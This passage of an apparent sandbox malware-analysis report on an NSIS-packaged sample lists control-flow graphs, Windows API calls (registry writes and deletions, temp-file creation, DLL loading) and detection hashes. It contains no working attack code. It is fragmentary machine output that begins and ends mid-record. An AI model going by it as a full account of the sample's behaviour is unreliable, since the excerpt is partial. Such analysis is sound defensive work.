406568-406572 556->559 557->556 567 406574-406577 559->567 568 40658c-4065a2 SHGetSpecialFolderLocation 559->568 560->555 561->554 565 4065d3-4065d9 lstrcatW 561->565 562->561 565->554 567->568 570 406579-406580 567->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 568->571 572 4065bd 568->572 573 406588-40658a 570->573 571->555 571->572 572->556 573->555 573->568
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-1230650788
                                                                                                            • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 663 4017dd-4017ef 654->663 664 4017cd-4017db CompareFileTime 654->664 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 663->655 664->663 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 700 401864-401865 667->700 678 401882-401888 668->678 682 402ace 678->682 680->681 684 4018d0-4018db CloseHandle 680->684 681->684 687 402ad0-402ad4 682->687 685 4018e1-4018e4 684->685 686 402ac5-402ac8 684->686 689 4018e6-4018f7 call 40640a lstrcatW 685->689 690 4018f9-4018fc call 40640a 685->690 686->682 696 401901-4022fc call 405a4e 689->696 690->696 696->687 700->678 702 401867-401868 700->702 702->668
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp$C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-1078035706
                                                                                                            • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 713 4027dc-4027e4 711->713 714 40267e-40268d call 406348 711->714 713->707 714->713 717 402693 714->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 722 402737-40273a 719->722 723 40274d-40275d call 405f61 719->723 720->713 721 4026c4-4026c9 720->721 721->713 724 4026cf-4026dd 721->724 722->723 725 40273c-402747 call 405fbf 722->725 723->713 731 40275f 723->731 728 4026e3-4026f5 MultiByteToWideChar 724->728 729 402798-4027a4 call 40632f 724->729 725->713 725->723 728->731 732 4026f7-4026fa 728->732 729->709 735 402762-402765 731->735 736 4026fc-402707 732->736 735->729 738 402767-40276c 735->738 736->735 739 402709-40272e SetFilePointer MultiByteToWideChar 736->739 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->736 742 402730 739->742 744 4027ca-4027d6 SetFilePointer 740->744 745 4027af-4027b3 740->745 741->740 743 402775-402788 741->743 742->731 743->713 746 40278a-402790 743->746 744->713 747 4027b5-4027b9 745->747 748 4027bb-4027c8 745->748 746->718 749 402796 746->749 747->744 747->748 748->713 749->713
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 757 70141777-701417b6 call 70141b5f 761 701418d6-701418d8 757->761 762 701417bc-701417c0 757->762 763 701417c2-701417c8 call 70142352 762->763 764 701417c9-701417d6 call 70142394 762->764 763->764 769 70141806-7014180d 764->769 770 701417d8-701417dd 764->770 771 7014182d-70141831 769->771 772 7014180f-7014182b call 70142569 call 701415b4 call 70141272 GlobalFree 769->772 773 701417df-701417e0 770->773 774 701417f8-701417fb 770->774 779 70141833-7014187c call 701415c6 call 70142569 771->779 780 7014187e-70141884 call 70142569 771->780 796 70141885-70141889 772->796 777 701417e2-701417e3 773->777 778 701417e8-701417e9 call 70142aac 773->778 774->769 775 701417fd-701417fe call 70142d37 774->775 789 70141803 775->789 784 701417e5-701417e6 777->784 785 701417f0-701417f6 call 70142724 777->785 792 701417ee 778->792 779->796 780->796 784->769 784->778 795 70141805 785->795 789->795 792->789 795->769 800 701418c6-701418cd 796->800 801 7014188b-70141899 call 7014252c 796->801 800->761 803 701418cf-701418d0 GlobalFree 800->803 807 701418b1-701418b8 801->807 808 7014189b-7014189e 801->808 803->761 807->800 810 701418ba-701418c5 call 7014153d 807->810 808->807 809 701418a0-701418a8 808->809 809->807 811 701418aa-701418ab FreeLibrary 809->811 810->800 811->807
                                                                                                            APIs
                                                                                                              • Part of subcall function 70141B5F: GlobalFree.KERNEL32(?), ref: 70141DB2
                                                                                                              • Part of subcall function 70141B5F: GlobalFree.KERNEL32(?), ref: 70141DB7
                                                                                                              • Part of subcall function 70141B5F: GlobalFree.KERNEL32(?), ref: 70141DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70141825
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 701418AB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701418D0
                                                                                                              • Part of subcall function 70142352: GlobalAlloc.KERNEL32(00000040,?), ref: 70142383
                                                                                                              • Part of subcall function 70142724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,701417F6,00000000), ref: 701427F4
                                                                                                              • Part of subcall function 701415C6: wsprintfW.USER32 ref: 701415F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                            • Opcode ID: 3dade1d598d4e2f4d4871086996d9b6ce8588f8020beb22855568e4145250f5d
                                                                                                            • Instruction ID: 2e5a84bfb52dac6e0d2b8fd9d51a11c52135cb47225cf3956eb260f1130e6277
                                                                                                            • Opcode Fuzzy Hash: 3dade1d598d4e2f4d4871086996d9b6ce8588f8020beb22855568e4145250f5d
                                                                                                            • Instruction Fuzzy Hash: CF41A0725002069ACB119F60DC85B8D37A8BF05311F766079FD0A9E6B6DBB89484C760

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 814 4023e4-402415 call 402c41 * 2 call 402cd1 821 402ac5-402ad4 814->821 822 40241b-402425 814->822 823 402427-402434 call 402c41 lstrlenW 822->823 824 402438-40243b 822->824 823->824 828 40243d-40244e call 402c1f 824->828 829 40244f-402452 824->829 828->829 832 402463-402477 RegSetValueExW 829->832 833 402454-40245e call 4031d6 829->833 836 402479 832->836 837 40247c-40255d RegCloseKey 832->837 833->832 836->837 837->821 839 40288b-402892 837->839 839->821
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp
                                                                                                            • API String ID: 2655323295-652375980
                                                                                                            • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                            • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 840 405f0d-405f19 841 405f1a-405f4e GetTickCount GetTempFileNameW 840->841 842 405f50-405f52 841->842 843 405f5d-405f5f 841->843 842->841 844 405f54 842->844 845 405f57-405f5a 843->845 844->845
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-1331003597
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 846 402d44-402d6d call 406255 848 402d72-402d74 846->848 849 402d76-402d7c 848->849 850 402dec-402df0 848->850 851 402d98-402dad RegEnumKeyW 849->851 852 402d7e-402d80 851->852 853 402daf-402dc1 RegCloseKey call 4067c2 851->853 855 402dd0-402dde RegCloseKey 852->855 856 402d82-402d96 call 402d44 852->856 860 402de0-402de6 RegDeleteKeyW 853->860 861 402dc3-402dce 853->861 855->850 856->851 856->853 860->850 861->850
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 863 40591f-40596a CreateDirectoryW 864 405970-40597d GetLastError 863->864 865 40596c-40596e 863->865 866 405997-405999 864->866 867 40597f-405993 SetFileSecurityW 864->867 865->866 867->865 868 405995 GetLastError 867->868 868->866
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
